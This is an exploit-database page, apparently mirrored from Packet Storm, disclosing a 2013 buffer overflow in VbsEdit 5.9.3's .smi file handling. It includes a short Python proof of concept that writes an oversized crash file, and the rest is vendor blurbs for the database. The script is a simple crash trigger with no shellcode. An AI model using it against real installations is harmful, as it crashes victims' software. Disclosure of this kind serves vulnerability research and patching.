Lucene search
K

VbsEdit 5.9.3 Buffer Overflow

🗓️ 22 Jul 2013 00:00:00Reported by d3b4gType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

VbsEdit 5.9.3 Buffer Overflow vulnerability in .smi file handlin

Code
`# Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability  
# Date: 22.7.2013  
# Exploit Author: d3b4g  
# Vendor Homepage:http://www.vbsedit.com/  
# Software Link: http://www.vbsedit.com/  
# Tested on: Windows XP SP3  
# Twitter: @schaba  
  
  
  
#!/usr/bin/python  
# Tested on: win XPsp3  
chars = "A"*90000  
crush = "\x41\x41\x41\x41"  
file=open('exp.smi','w')  
file.write(chars+crush+chars)  
file.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jul 2013 00:00Current
0.4Low risk
Vulners AI Score0.4
18